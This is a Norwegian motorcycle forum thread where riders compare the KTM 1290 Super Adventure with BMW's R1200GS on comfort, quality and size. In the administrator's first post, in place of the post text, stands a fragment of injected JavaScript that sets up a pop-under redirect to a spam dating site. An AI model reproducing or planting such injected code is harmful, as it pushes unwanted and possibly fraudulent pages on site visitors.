KTM 1290 Super Adventure - BMW R1200/1250GS utfordrer?
- AJ
- Administrator
- Innlegg: 37889
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
:-)
:-)
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- Bjerknez
- Innlegg: 22932
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Dette ser bra ut AJ
Tenker det klør litt i fingrene nå
Tenker det klør litt i fingrene nå
- AJ
- Administrator
- Innlegg: 37889
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Absolutt!Bjerknez skrev:Dette ser bra ut AJ
Tenker det klør litt i fingrene nå
Gleder meg voldsomt !!
Eneste bittelille "bekymringen" jeg har er salhøyden. 86 cm. er bittelitt over komfortgrensa... .
Men jeg satt godt på 1190'en. da. Og salhøyden på den er den samme som på 1290'en.
Så regner med at dette skal gå helt fint. Formen på salen er også ganske lik.
Joda, dette skal bli en bra sesong .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Jeg var bortom og tok ktm'n i nærmere øyesyn. Syns de svinglysene er smarte og den motoren er sikkert fantastisk. Synd at hovedstøtta skraper ved litt inspirert kjøring. Syns ikke den er i klasse med vanlig GS, men passer bra i GSA klassen. Salen var forferdelig hard og passet ikke meg. Ble også overrasket over holkene. De var små/trange selv uten hansker. Mange ukjente knapper, men det venner man seg vel til.
- Bringisen
- Innlegg: 1725
- Registrert: 15 des 2010, 16:47
- Motorsykkelen din: BMW R1200GS 2014
- Sted: Bergen
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Akkurat dette var noe av det som jeg ble skuffet over da jeg hadde en lengre prøvekjøring av Ktm 1190 Adv i fjor før jeg kjøpte R1200GS.Æljen skrev:Salen var forferdelig hard og passet ikke meg. Ble også overrasket over holkene. De var små/trange selv uten hansker. Mange ukjente knapper, men det venner man seg vel til.
Den opplevde kvaliteten og følelsen var ikke på nivå med det jeg var vant med, her er BMW i en klasse for seg. Man blir fort godt vant, og det har sikkert ikke like mye å si for alle.
Uansett skal vi ikke ødelegge gleden for AJ som venter en fantastisk flott sykkel, jeg husker enda følelsen fra i fjor og jeg har enda sommefugler i magen nå nå det nermer seg sesongstart.
Gratulerer med ny sykkel AJ, jeg har ikke fått dette med meg før nå jeg
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Rumpa må vennes til hardere sal. Da den er blitt det er hardere sal å foretrekke. Vet ikke hvilken kvalitetsfølelse du snakker om vedrørende GS, de gangene jeg kjører det er det som hvilken som helst annen sykkel i den klassen.
Sent from my iPhone using Tapatalk
Sent from my iPhone using Tapatalk
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Opplevd kvalitet er ikke et sannhetsbevisBringisen skrev:Akkurat dette var noe av det som jeg ble skuffet over da jeg hadde en lengre prøvekjøring av Ktm 1190 Adv i fjor før jeg kjøpte R1200GS.
Den opplevde kvaliteten og følelsen var ikke på nivå med det jeg var vant med, her er BMW i en klasse for seg. Man blir fort godt vant, og det har sikkert ikke like mye å si for alle.
Jeg har kjørt både GS og KTM og klarer ikke å se det du ser mht. kvalitet. Tror heller det er måten plasten er utformet. Det at plast ser ut som aluminium gjør ikke kvaliteten bedre Jeg opplevde KTMen som en meget god sykkel, og eneste grunn til at jeg kjøpte GSen var at den var en del billigere.
Du får nok en kjempesykkel AJ, med minst like god kvalitet som BMW, uansett hva "fanboysa" sier
Sist redigert av Zadnez den 12 mar 2015, 07:11, redigert 1 gang totalt.
Katalysator er en kul ting som ikke bør skjules
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Har sett en video på youtube der en klager på at knappene føles billige ut på den nye Gs'en. Så denne opplevde kvaliteten er vel individueltZadnez skrev:Akkurat dette var noe av det som jeg ble skuffet over da jeg hadde en lengre prøvekjøring av Ktm 1190 Adv i fjor før jeg kjøpte R1200GS.
Den opplevde kvaliteten og følelsen var ikke på nivå med det jeg var vant med, her er BMW i en klasse for seg. Man blir fort godt vant, og det har sikkert ikke like mye å si for alle.
Opplevd kvalitet er ikke et sannhetsbevis
Jeg har kjørt både GS og KTM og klarer ikke å se det du ser mht. kvalitet. Tror heller det er måten plasten er utformet. Det at plast ser ut som aluminium gjør ikke kvaliteten bedre Jeg opplevde KTMen som en meget god sykkel, og eneste grunn til at jeg kjøpte GSen var at den var en del billigere.
Du får nok en kjempesykkel AJ, med minst like god kvalitet som BMW, uansett hva "fanboysa" sier
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.
- Bringisen
- Innlegg: 1725
- Registrert: 15 des 2010, 16:47
- Motorsykkelen din: BMW R1200GS 2014
- Sted: Bergen
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Det er jo akkurat det som er så bra. Hadde alle likt samme kjerringen eller samme sykkel hadde det blitt både trøbbel og kjedelig At noen mener at det ikke er en bedre opplevd kvalitet på BMW enn på det meste annet virker på meg uforståelig. En ganske så stor forskjell merker jeg i det sykkelen bestiges. Men jeg skal ikke lage et stort nummer av det. Det er akkurat samme følelsen jeg har når jeg flytter meg fra en Toyota til en VW, en stor følelses forskjell. At opplevd kvalitet ikke er et sannhetsbevis er jeg helt enig i, det er viktig at man kan skille mellom opplevd kvalitet og faktisk kvalitet. Opplevd kvalitet handler om følelse. Og følelsen kan ingen ta fra oss. ( men vi kan tenke for oss selv at andres følelse eller oppfattelse er helt på jordet uten å si det høyt)
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.
- AJ
- Administrator
- Innlegg: 37889
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Fikk ingen betenkeligheter etter prøvesitting god tid til å "føle og ta" på sykkelen på MC-messa.
Passet meg utmerket selv om det ikke hadde gjort noe med et par cm. lavere salhøyde.
Synes finishen så god ut, og de aller fleste detaljer så og føltes bra ut.
Men som med alle andre sykler er det helt sikkert noen budsjettdetaljer på denne også.
Bakpå prøvde selvfølgelig passasjersalen og meldte straks at den var godkjent .
Troen er ytterligere styrket på at dette er en sykkel jeg kommer til å trives med
Så er det bare å håpe at den blir leveringsklar i april...
Passet meg utmerket selv om det ikke hadde gjort noe med et par cm. lavere salhøyde.
Synes finishen så god ut, og de aller fleste detaljer så og føltes bra ut.
Men som med alle andre sykler er det helt sikkert noen budsjettdetaljer på denne også.
Bakpå prøvde selvfølgelig passasjersalen og meldte straks at den var godkjent .
Troen er ytterligere styrket på at dette er en sykkel jeg kommer til å trives med
Så er det bare å håpe at den blir leveringsklar i april...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
- Innlegg: 6860
- Registrert: 31 aug 2010, 00:17
- Motorsykkelen din: KTM 1290 Super Adventure
- Sted: Bergen
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Stod å sturderte denne sykkelen nede på Ride i dag, før jeg fikk hentet ut og betalt for sykkelen min. Den er utrolig kul, men den ser veldig stor ut rett forfra.... Er noe der som ikke er konstruert riktig.
Men må si jeg har veldig lyst å prøvekjøre dette "toget" av en sykkel. For den er stor..... spm er føles den like stor som den ser ut
Men må si jeg har veldig lyst å prøvekjøre dette "toget" av en sykkel. For den er stor..... spm er føles den like stor som den ser ut
- AJ
- Administrator
- Innlegg: 37889
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
1290'en blir seende ekstra stor ut i fronten når vindskjermen er satt i høyeste stilling.LordShaft skrev:Stod å sturderte denne sykkelen nede på Ride i dag, før jeg fikk hentet ut og betalt for sykkelen min. Den er utrolig kul, men den ser veldig stor ut rett forfra.... Er noe der som ikke er konstruert riktig.
Men må si jeg har veldig lyst å prøvekjøre dette "toget" av en sykkel. For den er stor..... spm er føles den like stor som den ser ut
Ellers er nok konstruksjonen rimelig høyreist i utgangspunktet.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
- Innlegg: 6860
- Registrert: 31 aug 2010, 00:17
- Motorsykkelen din: KTM 1290 Super Adventure
- Sted: Bergen
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Ja den var faktisk overraskende stor, og veldig bred.... Men om jeg ikke husker feil, så hadde den 30L tank?
Er mulig det bare er en vanesak... Men som du ser på bildet over....den ser ikke en mm feil ut fra siden
Er mulig det bare er en vanesak... Men som du ser på bildet over....den ser ikke en mm feil ut fra siden
- AJ
- Administrator
- Innlegg: 37889
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
30 liters tank er korrekt.
I tillegg har den jo disse kurvelysene innebygd, som gjør at den bygger mer en bredden enn om disse lysene ikke hadde vært der...
Når det gjelder den høyreiste fronten så kan det gjøres noe med dette. På 1290'en er det nemlig mulig å skru løs vindskjermbraketten og snu denne opp-ned for på den måten å få senket vindskjermhøyden enda mer enn laveste stilling slik braketten er montert originalt.
Uansett så blir likevel ikke fronten på SA'en i nærheten av så stuket som en BMW S1000 R... .
I tillegg har den jo disse kurvelysene innebygd, som gjør at den bygger mer en bredden enn om disse lysene ikke hadde vært der...
Når det gjelder den høyreiste fronten så kan det gjøres noe med dette. På 1290'en er det nemlig mulig å skru løs vindskjermbraketten og snu denne opp-ned for på den måten å få senket vindskjermhøyden enda mer enn laveste stilling slik braketten er montert originalt.
Uansett så blir likevel ikke fronten på SA'en i nærheten av så stuket som en BMW S1000 R... .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: KTM 1290 Super Adventure - BMW GS 1200 utfordrer?
Er nok en eminent kontinentkrysser den KTM'en. Tror ikke du trenger å stresse om en GS byr opp til dans
Gratulerer med valget! Blir spennende å høre tilbakemeldinger når du har fått kjørt den.
Gratulerer med valget! Blir spennende å høre tilbakemeldinger når du har fått kjørt den.